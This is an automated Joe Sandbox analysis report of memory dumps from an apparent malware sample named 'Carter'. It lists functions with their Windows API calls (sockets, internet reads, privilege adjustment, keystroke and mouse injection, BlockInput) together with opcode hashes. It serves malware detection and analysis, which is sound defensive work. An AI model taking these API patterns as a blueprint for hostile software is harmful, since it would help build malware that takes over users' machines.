                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 2387731787-0
                                                                            • Opcode ID: 6bbf40bd55b4c4bf1f8791b38a9f4d31fd30bf3c8b59839c57d6aaadb864c022
                                                                            • Instruction ID: ccf62fd378a34b4f490029256017f6ab1f9e89d56c0f44e1dc87040dce724a02
                                                                            • Opcode Fuzzy Hash: 6bbf40bd55b4c4bf1f8791b38a9f4d31fd30bf3c8b59839c57d6aaadb864c022
                                                                            • Instruction Fuzzy Hash: 18517E756246028FD714DF68D490EAAB3E8EF49310F20465EF95AC73A1DB30AD25CF91
                                                                            Function 002E6E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002E8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002E84A0
                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002E6E89
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E6EB2
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 002E6EEB
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E6EF8
                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 002E6F0C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 99427753-0
                                                                            • Opcode ID: 4f7e0d43f03abf1a5110b66921180ea4b72c6e0c832cce93a5a5b48931bea0b4
                                                                            • Instruction ID: e4b7f0c99e64057bfdeb4536e03898a69b0456f022a10acd3d044d2dcbba5e11
                                                                            • Opcode Fuzzy Hash: 4f7e0d43f03abf1a5110b66921180ea4b72c6e0c832cce93a5a5b48931bea0b4
                                                                            • Instruction Fuzzy Hash: E441E375660200AFDB10BF64D886F7E73A89B04714F44C558F949AB3C2CB709D208FA1
                                                                            Function 002F59B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: d8ec0efbb1b626f976a9c2c369a912927536b9d2bdfbd6a32c4ec2b5bea3a09d
                                                                            • Instruction ID: 69b7fc4c171e2ea5c590b727d8e7cb1dd2ae1f81cfdf6b8750a425cf988e6294
                                                                            • Opcode Fuzzy Hash: d8ec0efbb1b626f976a9c2c369a912927536b9d2bdfbd6a32c4ec2b5bea3a09d
                                                                            • Instruction Fuzzy Hash: C511E6313219269FE7261F268C84B3AB79DEF447A0F00413AEA4AD7241CB70AD218ED0
                                                                            Function 002B0030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime__swprintf
                                                                            • String ID: %.3d$WIN_XPe
                                                                            • API String ID: 2070861257-2409531811
                                                                            • Opcode ID: 12f62edcda256671075dc9b0dbc98903c511526cdbaebed74dd3d658dd788267
                                                                            • Instruction ID: 00d9e6258627725737f161aaede4964e3ec2ebfc17e220c5b29c46f452aa2527
                                                                            • Opcode Fuzzy Hash: 12f62edcda256671075dc9b0dbc98903c511526cdbaebed74dd3d658dd788267
                                                                            • Instruction Fuzzy Hash: 52D01271834118EACB0AAA90C8C4EFB737CFB04344F144852F506A2040D2B597A8AB26
                                                                            Function 002E29BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002E1ED6,00000000), ref: 002E2AAD
                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 002E2AE4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                            • String ID:
                                                                            • API String ID: 599397726-0
                                                                            • Opcode ID: accae122b5c0025adfc97e5eefae0b939fbe12c892638175ed5448164f8c2368
                                                                            • Instruction ID: 0c6b0dcf0be5d2ada7a349eba58dc91816d23cbcd23d160addcf0909d94864fe
                                                                            • Opcode Fuzzy Hash: accae122b5c0025adfc97e5eefae0b939fbe12c892638175ed5448164f8c2368
                                                                            • Instruction Fuzzy Hash: 53412B7166024AFFEB20DE56CC81FBB73BCEB40714F50402EF606A3241D6B19E659B60
                                                                            Function 002C9399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00290FE6: std::exception::exception.LIBCMT ref: 0029101C
                                                                              • Part of subcall function 00290FE6: __CxxThrowException@8.LIBCMT ref: 00291031
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C93E3
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C9410
                                                                            • GetLastError.KERNEL32 ref: 002C941D
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1922334811-0
                                                                            • Opcode ID: 001496ec5945f6626fe23fd30a5d3329b7bd413e81300468d2093b279496cdf5
                                                                            • Instruction ID: 13acba64fb0f6ff1c5141e25f106923ad77556c45913ac4f2bffc9d390ced9e7
                                                                            • Opcode Fuzzy Hash: 001496ec5945f6626fe23fd30a5d3329b7bd413e81300468d2093b279496cdf5
                                                                            • Instruction Fuzzy Hash: ED118FB2424209AFD728DF64DCC9E2BB7BCFB44710B20866EF45993640EB70AC51CB64
                                                                            Function 002D4254 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002D4271
                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 002D42B2
                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002D42BD
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                            • String ID:
                                                                            • API String ID: 33631002-0
                                                                            • Opcode ID: f13dee96c0085d9bdd0470fb8b4c35e94706758093271fa5ac504ccca360a983
                                                                            • Instruction ID: 59f84b713879cab1d4570cd31b5134a11a5cb405ff5e278157c2a847bb48e224
                                                                            • Opcode Fuzzy Hash: f13dee96c0085d9bdd0470fb8b4c35e94706758093271fa5ac504ccca360a983
                                                                            • Instruction Fuzzy Hash: F7113C75E01228BBDB159FA5AC49BAFBBBCEB45B60F104156FD04E7290C6705E018BA1
                                                                            Function 002D4F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002D4F45
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002D4F5C
                                                                            • FreeSid.ADVAPI32(?), ref: 002D4F6C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: fa7c284fdd5899b5d8f4031e8d3006579ee7dea3e1064b3cd003374e48f87508
                                                                            • Instruction ID: 6e40ba09a8cb15da5c17fe87d7f8f70e38dedec18f45bb0c6fdac94fed4fb43d
                                                                            • Opcode Fuzzy Hash: fa7c284fdd5899b5d8f4031e8d3006579ee7dea3e1064b3cd003374e48f87508
                                                                            • Instruction Fuzzy Hash: B8F04F7591130DBFDF04DFE0DC99EAEB7BCEF08301F004469A501E2580D7345A048B50
                                                                            Function 002D1AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 002D1B01
                                                                            • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 002D1B14
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: InputSendkeybd_event
                                                                            • String ID:
                                                                            • API String ID: 3536248340-0
                                                                            • Opcode ID: 6881924a06c31f63a7585af24341c7524628b6cff3b55870eb9d619f102789e7
                                                                            • Instruction ID: 933ad784b8db9b6cfbd160071774896904e12870c0c45d48d376b8bc4602902d
                                                                            • Opcode Fuzzy Hash: 6881924a06c31f63a7585af24341c7524628b6cff3b55870eb9d619f102789e7
                                                                            • Instruction Fuzzy Hash: F9F0A93190024DABDB04CF90C805BFE7BB8FF04305F00800BF94596292D3798A21DF94
                                                                            Function 002DA6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,002E9B52,?,0030098C,?), ref: 002DA6DA
                                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,002E9B52,?,0030098C,?), ref: 002DA6EC
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: 0030d8f36bab7f24a7c641ec082ee9816dcb6d1606d883520378f8c779ba9341
                                                                            • Instruction ID: ef587a2229bed34b37fc9683aca49a4d667b4697d298346e13076fc3c54a6b9f
                                                                            • Opcode Fuzzy Hash: 0030d8f36bab7f24a7c641ec082ee9816dcb6d1606d883520378f8c779ba9341
                                                                            • Instruction Fuzzy Hash: 2AF0893551521EFBDB21AFA4CC48FDA776CAF09761F008156B50896181D670DA50CFE1
                                                                            Function 002C8DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002C8F27), ref: 002C8DFE
                                                                            • CloseHandle.KERNEL32(?,?,002C8F27), ref: 002C8E10
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                            • String ID:
                                                                            • API String ID: 81990902-0
                                                                            • Opcode ID: 9666c56728512fccc471014fe3d4eeb3fe6c35af3748e7e80ad0ed203e2f2d0d
                                                                            • Instruction ID: 2c7c93e220d96f3749a678059b64a959f04299c6e915ffe4b38806d650d88d3d
                                                                            • Opcode Fuzzy Hash: 9666c56728512fccc471014fe3d4eeb3fe6c35af3748e7e80ad0ed203e2f2d0d
                                                                            • Instruction Fuzzy Hash: 45E0BF75011611EFEB262B61EC19E7777ADEB04311B14891DF86580470DB725CA0DB50
                                                                            Function 0029A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00298F87,?,?,?,00000001), ref: 0029A38A
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0029A393
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 17334299676b01861d356d051c0b44218a8007a99eddd11ef3102eec4a9c3a00
                                                                            • Instruction ID: 9b124ad27cb5d86aac130b35e67f78f89859d744ade547f56899a4f2fed8f8e1
                                                                            • Opcode Fuzzy Hash: 17334299676b01861d356d051c0b44218a8007a99eddd11ef3102eec4a9c3a00
                                                                            • Instruction Fuzzy Hash: F4B09235065208ABCA472B91EC19B883F6CEB45B62F004092F64D44060CB6254508A91
                                                                            Function 002E45D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BlockInput.USER32(00000001), ref: 002E45F0
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BlockInput
                                                                            • String ID:
                                                                            • API String ID: 3456056419-0
                                                                            • Opcode ID: f1376e34d7e85fdbcd2e0c49ec33e0587b332e1becfbf8017fcc0cc0373017e7
                                                                            • Instruction ID: ec721a0e9c31d92671d7d5f0fe37342c222de18699a07d54b0f4f661ad760e3d
                                                                            • Opcode Fuzzy Hash: f1376e34d7e85fdbcd2e0c49ec33e0587b332e1becfbf8017fcc0cc0373017e7
                                                                            • Instruction Fuzzy Hash: C6E09A312202199FC310BF5AE800A9AF7E8EFA8760F008016F849D7310DAB0A9108B90
                                                                            Function 002D51E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002D5205
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: mouse_event
                                                                            • String ID:
                                                                            • API String ID: 2434400541-0
                                                                            • Opcode ID: cc59aab34f554b1664a4488b9ef3ce0bbbfbb49cf5472193365a6334c0cfc2fb
                                                                            • Instruction ID: ce44b320f3911266854c4f7526b45908646ba53db43320390a0f125d083b0315
                                                                            • Opcode Fuzzy Hash: cc59aab34f554b1664a4488b9ef3ce0bbbfbb49cf5472193365a6334c0cfc2fb
                                                                            • Instruction Fuzzy Hash: 3AD092A6174E2A79ED580B249E1FF761608E3027C1F94868B714A892C2ECD4ECA5A831
                                                                            Function 002C9369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002C8FA7), ref: 002C9389
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LogonUser
                                                                            • String ID:
                                                                            • API String ID: 1244722697-0
                                                                            • Opcode ID: bd09888f822963a6866cce67908cf90f794a08ae657562497dcbe58c831b3727
                                                                            • Instruction ID: f006a76aab62bd96e72e8a6e3f1739985abb7c7807602977764aecaea121bc90
                                                                            • Opcode Fuzzy Hash: bd09888f822963a6866cce67908cf90f794a08ae657562497dcbe58c831b3727
                                                                            • Instruction Fuzzy Hash: A7D05E3226050EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A0C775D835AB60
                                                                            Function 002B0722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 002B0734
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: cadb00760fe7f573653db9684b8f47da1f1a671a0fbf7ee3951caa977e2c0c8c
                                                                            • Instruction ID: f580a8b916f58ec2bd3ca9c8e39aa066031487c4c6697cf57577fe29898f7179
                                                                            • Opcode Fuzzy Hash: cadb00760fe7f573653db9684b8f47da1f1a671a0fbf7ee3951caa977e2c0c8c
                                                                            • Instruction Fuzzy Hash: 47C04CF1C11109DBDB06DBA0D998EEF77BCAB04304F104456A105B2100D7749B448A71
                                                                            Function 0029A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0029A35A
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
